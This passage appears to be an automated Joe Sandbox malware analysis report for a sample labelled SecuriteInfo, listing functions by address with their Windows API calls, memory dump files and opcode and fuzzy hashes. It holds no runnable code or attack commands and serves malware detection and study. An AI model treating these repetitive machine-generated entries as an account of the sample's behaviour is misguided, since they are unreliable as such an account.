                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction ID: dfe1822f6e12dc40fec7d7312b72fd0d431e3cfbd0a832c5db69d9e23a8b6492
                                                                                          • Opcode Fuzzy Hash: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction Fuzzy Hash: B5314970E016099FEB00CF69CC80F6EB7F9AF89210F60859AE519E7251CB75E941CF50
                                                                                          Function 6D0291A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction ID: 6ae69e309a028229d8c918921bcfde5664e880027cd096b334ef9282a8e3a654
                                                                                          • Opcode Fuzzy Hash: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction Fuzzy Hash: 01314870E016099FEB00CFA9CD80F6EB7FAAF89210F20858AE519E7251CB75E941CF50
                                                                                          Function 6D02908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction ID: aeb68c3e2c077430e17ff1da57800e140ccfb2c719b90e554f504f8cd9dd81a7
                                                                                          • Opcode Fuzzy Hash: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction Fuzzy Hash: F7314870E016199FEB00CFA8CC80F6EB7FAAF89210F20858AE518E7251DB75E941CF50
                                                                                          Function 6D029237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction ID: 8baf4f5f9da4ade22e6236041eb780b56e19faec68072a506d7b4a95cd74abb6
                                                                                          • Opcode Fuzzy Hash: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction Fuzzy Hash: 2B312770E016199FEB00DFA8CC80F6EB7FAAF89210F60858AE519E7251CB75E9418F50
                                                                                          Function 6D0292C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction ID: a9c7c02e9e7e9707b44c5a3c1034b94351113621f4cc74786b2f446ec661bb1e
                                                                                          • Opcode Fuzzy Hash: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction Fuzzy Hash: 3D312870E016199FEB00DBA8CC80F6EB7FAAF89210F208586E519E7251CB75E941CF50
                                                                                          Function 6D02C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C180
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D023749,?), ref: 6D02C1B8
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C1C4
                                                                                          • VariantCopy.OLEAUT32(6D023749,?), ref: 6D02C21B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C22F
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02C23E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3979206172-0
                                                                                          • Opcode ID: cc3e397e55a881c6f5d10454a59b8601dfefb7d7a1e08c33c81fe209c0ca6a9d
                                                                                          • Instruction ID: 0d5853040ce633a852eccba580a4b440dfcbeb56478b2448cf0031e7741f6e51
                                                                                          • Opcode Fuzzy Hash: cc3e397e55a881c6f5d10454a59b8601dfefb7d7a1e08c33c81fe209c0ca6a9d
                                                                                          • Instruction Fuzzy Hash: D2314C75A04209AFDF00DFA8C895BAEBBB9EF5E301F108529E916D7350EB35D905CB60
                                                                                          Function 6D017370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6D0811FD,000000FF,?,6D018B80,00000000,?,00000000,?,6D018C13,?,?), ref: 6D017415
                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6D0811FD,000000FF,?,6D018B80,00000000,?,00000000,?,6D018C13,?,?), ref: 6D01741B
                                                                                          • std::exception::exception.LIBCMT ref: 6D01743D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D017452
                                                                                          • std::exception::exception.LIBCMT ref: 6D017461
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D017476
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 189561132-0
                                                                                          • Opcode ID: 4bac63560436791c79a780c8b5e9acfd269aded0679b8e55b010d550d98d2ace
                                                                                          • Instruction ID: b0c41b0b0f634ae2be9877483412308809388825198e4053a3b2743b3ed7aefe
                                                                                          • Opcode Fuzzy Hash: 4bac63560436791c79a780c8b5e9acfd269aded0679b8e55b010d550d98d2ace
                                                                                          • Instruction Fuzzy Hash: B3316AB29046449FDB10CF99D880A9AFBF4FF58310B45855EE95AD7B41E730E504CFA1
                                                                                          Function 6D028D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction ID: b793d4d8616da72c19f9feee69b2ee5cbcdb6620bc4276c8d8bd51057014ddde
                                                                                          • Opcode Fuzzy Hash: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction Fuzzy Hash: 76312B70E016189FDB10CB68CC80FAEB7F9AF89210F60868AE519E7255DB75E9418F50
                                                                                          Function 6D028C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction ID: 6c3f13ae552290e03c75501d500b1a0485c16d8a630b6eda17b333628f1e6ef2
                                                                                          • Opcode Fuzzy Hash: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction Fuzzy Hash: 41314970E016189FEB10DB68CC80F6EB7FAAF89210F24859AE419E7241CB71E9418F50
                                                                                          Function 6D028F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction ID: 2fde36ab5ab06b65cbe2aa238e9e261c250ea5d949ed267dfe14e1451a7dcbc6
                                                                                          • Opcode Fuzzy Hash: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction Fuzzy Hash: 1E313870E016189FEB10CBA8CC80FAEB7FAAF89210F20858AE519E7241CB71DD418F50
                                                                                          Function 6D028E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: f40f4406ed0ed4d5cce1a18cd63a963c216b881fcc09837aae5c228ed9300d86
                                                                                          • Instruction ID: 0715d32d4c3751cd5b48b17a79a07be22c31565fc64313bdf125f13a01e74ade
                                                                                          • Opcode Fuzzy Hash: f40f4406ed0ed4d5cce1a18cd63a963c216b881fcc09837aae5c228ed9300d86
                                                                                          • Instruction Fuzzy Hash: 42312B70E016199FEF10DFA8CC80F6EB7F9AF89210F60868AE519E7255CB71E9418F50
                                                                                          Function 6D02884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
